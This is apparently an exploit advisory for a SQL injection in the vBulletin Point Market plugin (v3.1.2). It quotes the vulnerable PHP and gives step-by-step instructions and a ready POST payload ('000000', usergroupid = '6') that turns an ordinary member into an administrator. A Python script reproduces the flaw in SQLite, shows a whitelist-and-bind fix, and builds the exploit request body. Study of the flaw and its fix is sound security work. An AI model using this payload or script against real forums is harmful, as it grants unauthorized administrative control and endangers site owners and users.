vBulletin Point Market System Plugin – SQL Injection

Plugin: http://www.vbulletin.org/forum/showthread.php?t=232676
Version: 3.1.2 (latest)

The vulnerability resides in pointmarket/market_purchase.php, where user-controlled POST values are interpolated directly into SQL strings.

One of the vulnerable code paths is the following (the "Change User Name Glow" purchase):

// *********** Change User Name Glow *************
if ($itembuy[marketid] == 15 AND $error == 0) {
    if (!$color) {
        $error = 9; // User did not select a color.
    }
    if ($error == 0) {
        if ($method != 4) {
            // Single-currency purchase. $color comes straight from the POST body and is
            // interpolated into the SET clause without escaping.
            $vbulletin->db->query_read("update " . TABLE_PREFIX . "user set $xperience `$payment`=$ppoints-$amount, market_purchases=market_purchases+1, market_username_glow='$color' where userid='$userid'");
            $vbulletin->db->query_read("insert into " . TABLE_PREFIX . "market_transactions set `expire_date`='$expire', `coupon`='$cid[id]', `date`='$time', marketid='$itembuy[marketid]', mid='$itembuy[mid]',  userid='$userid', affecteduser='$userid', `$pamount`='$amount'");
            // vBExperience Addon
            if ($payment == "market_xperience") {
                $vbulletin->db->query_write("update " . TABLE_PREFIX . "xperience_stats set points_xperience=points_xperience-$amount, points_shop=points_shop+$amount where userid='$userid'");
            }
        } else {
            // Two-currency purchase; the same unescaped $color is written here as well.
            $vbulletin->db->query_read("update " . TABLE_PREFIX . "user set $xperience `$pointfield`=$points-$amount1, `$pointfield2`=$points2-$amount2, market_purchases=market_purchases+1, market_username_glow='$color' where userid='$userid'");
            $vbulletin->db->query_read("insert into " . TABLE_PREFIX . "market_transactions set `expire_date`='$expire', `coupon`='$cid[id]', `date`='$time', marketid='$itembuy[marketid]', mid='$itembuy[mid]',  userid='$userid', affecteduser='$userid', `amount`='$amount', `amount2`='$amount2'");
            // vBExperience Addon
            if ($pointfield == "market_xperience") {
                $vbulletin->db->query_write("update " . TABLE_PREFIX . "xperience_stats set points_xperience=points_xperience-$amount1, points_shop=points_shop+$amount1 where userid='$userid'");
            }
            if ($pointfield2 == "market_xperience") {
                $vbulletin->db->query_write("update " . TABLE_PREFIX . "xperience_stats set points_xperience=points_xperience-$amount2, points_shop=points_shop+$amount2 where userid='$userid'");
            }
        }
    }
}

Every variable in these statements is interpolated straight into the SQL string, with no escaping and no type check. The easiest one to abuse is $color: it is taken from the POST body and written as market_username_glow='$color'. Because that value sits inside the SET clause of an UPDATE on the user table, restricted only by userid='$userid' (our own row), closing the quote and appending another column assignment lets us set any column of our own account, including usergroupid. Pointing usergroupid at the administrator usergroup promotes the account and gives us the admin control panel.

Note that exploitation requires an account that can use the market and can buy one of the affected products; the purchase has to go through ($error == 0) for the UPDATE to run.

The following products, which can be bought in the plugin's market, are affected because each one writes a user-supplied color or font value in the same way:
Change User Title Color, Change User Title Glow, Change User Name Color, Change User Name Glow, Post Font Face, Post Font Color, Thread Color.

Open the purchase page of one of these products and use the browser's developer tools (or an intercepting proxy) to replace the value of the color or face POST parameter before the form is submitted.

POST to:    http://example.com/market.php?do=purchase
POST data:  payment1: 1
            item_id: 15
            color: 000000', usergroupid = '6
            securitytoken: yoursecuritytoken

Set usergroupid to the id of the administrator usergroup, which is 6 on a default vBulletin installation. The securitytoken has to be the valid token for your own session, since vBulletin rejects the POST without it; the form on the purchase page already carries it.
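The following Python script is an added example and is not part of the original advisory or of the plugin. It reproduces the $color injection described above against an in-memory SQLite stand-in for the user table, shows the account's usergroupid flipping to 6, then shows a hardened variant that whitelists the color (a six-digit hex string, an assumed fix) and binds all values, and finally builds the URL-encoded POST body from the request shown above. The table layout, the vb_ prefix, the point amount and the user id are constructed for the demo; the real table has many more columns and the plugin's column name for points comes from $payment.

```python
"""Added example: the Point Market $color injection reproduced in SQLite.

Not the plugin's code.  Schema, prefix, user id and point amount are made up
for the demo; 'vb_' stands in for TABLE_PREFIX, and the hex-colour whitelist
is an assumed fix, not one shipped by the plugin.
"""
import re
import sqlite3
from urllib.parse import urlencode

ADMIN_USERGROUPID = 6  # default vBulletin Administrators usergroup
HEX_COLOR = re.compile(r"^[0-9A-Fa-f]{6}$")  # assumed whitelist for a fixed version


def fresh_db():
    """Constructed stand-in for the vBulletin user table with one ordinary member."""
    db = sqlite3.connect(":memory:")
    db.execute(
        "CREATE TABLE vb_user (userid INTEGER PRIMARY KEY, usergroupid INTEGER, "
        "market_points INTEGER, market_purchases INTEGER, market_username_glow TEXT)"
    )
    db.execute("INSERT INTO vb_user VALUES (2, 2, 500, 0, NULL)")  # usergroupid 2 = Registered
    db.commit()
    return db


def vulnerable_purchase(db, userid, color, amount=50):
    """Mirror the plugin's string-built UPDATE: $color lands inside the SET clause.

    The real code uses the pre-fetched $ppoints value; the arithmetic is the same.
    Returns the SQL that was executed so the injected clause can be inspected.
    """
    sql = (
        "update vb_user set `market_points`=market_points-%d, "
        "market_purchases=market_purchases+1, market_username_glow='%s' "
        "where userid='%s'" % (amount, color, userid)
    )
    db.execute(sql)
    db.commit()
    return sql


def hardened_purchase(db, userid, color, amount=50):
    """Assumed fix: reject anything that is not a hex colour, bind every value.

    Returns True when the purchase ran, False when the colour was rejected.
    """
    if not HEX_COLOR.match(color):
        return False
    db.execute(
        "update vb_user set market_points=market_points-?, "
        "market_purchases=market_purchases+1, market_username_glow=? "
        "where userid=?",
        (amount, color, userid),
    )
    db.commit()
    return True


def usergroup_of(db, userid):
    """Current usergroupid of the given account."""
    row = db.execute("select usergroupid from vb_user where userid=?", (userid,)).fetchone()
    return row[0]


def injected_color(usergroupid=ADMIN_USERGROUPID):
    """The payload from the advisory: close the quote, add a column assignment."""
    return "000000', usergroupid = '%d" % usergroupid


def exploit_body(securitytoken, item_id=15, usergroupid=ADMIN_USERGROUPID):
    """URL-encoded body for POST market.php?do=purchase with the injected colour."""
    return urlencode({
        "payment1": 1,
        "item_id": item_id,  # 15 = Change User Name Glow
        "color": injected_color(usergroupid),
        "securitytoken": securitytoken,
    })


if __name__ == "__main__":
    db = fresh_db()
    print(vulnerable_purchase(db, 2, injected_color()))
    print("usergroupid after injection:", usergroup_of(db, 2))
    db = fresh_db()
    print("hardened accepts payload:", hardened_purchase(db, 2, injected_color()))
    print("hardened accepts 00ff00:", hardened_purchase(db, 2, "00ff00"))
    print("usergroupid with hardened code:", usergroup_of(db, 2))
    print(exploit_body("yoursecuritytoken"))
```

The injected UPDATE is a single, syntactically valid statement, so no stacked-query support is needed: the payload only extends the SET list, and the WHERE clause the plugin supplies conveniently limits the change to the attacker's own row. Escaping alone (MySQL's real_escape_string) would stop this particular payload, but the whitelist plus bound parameters also removes the class of bug for the font-face products, where the expected value is not numeric.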
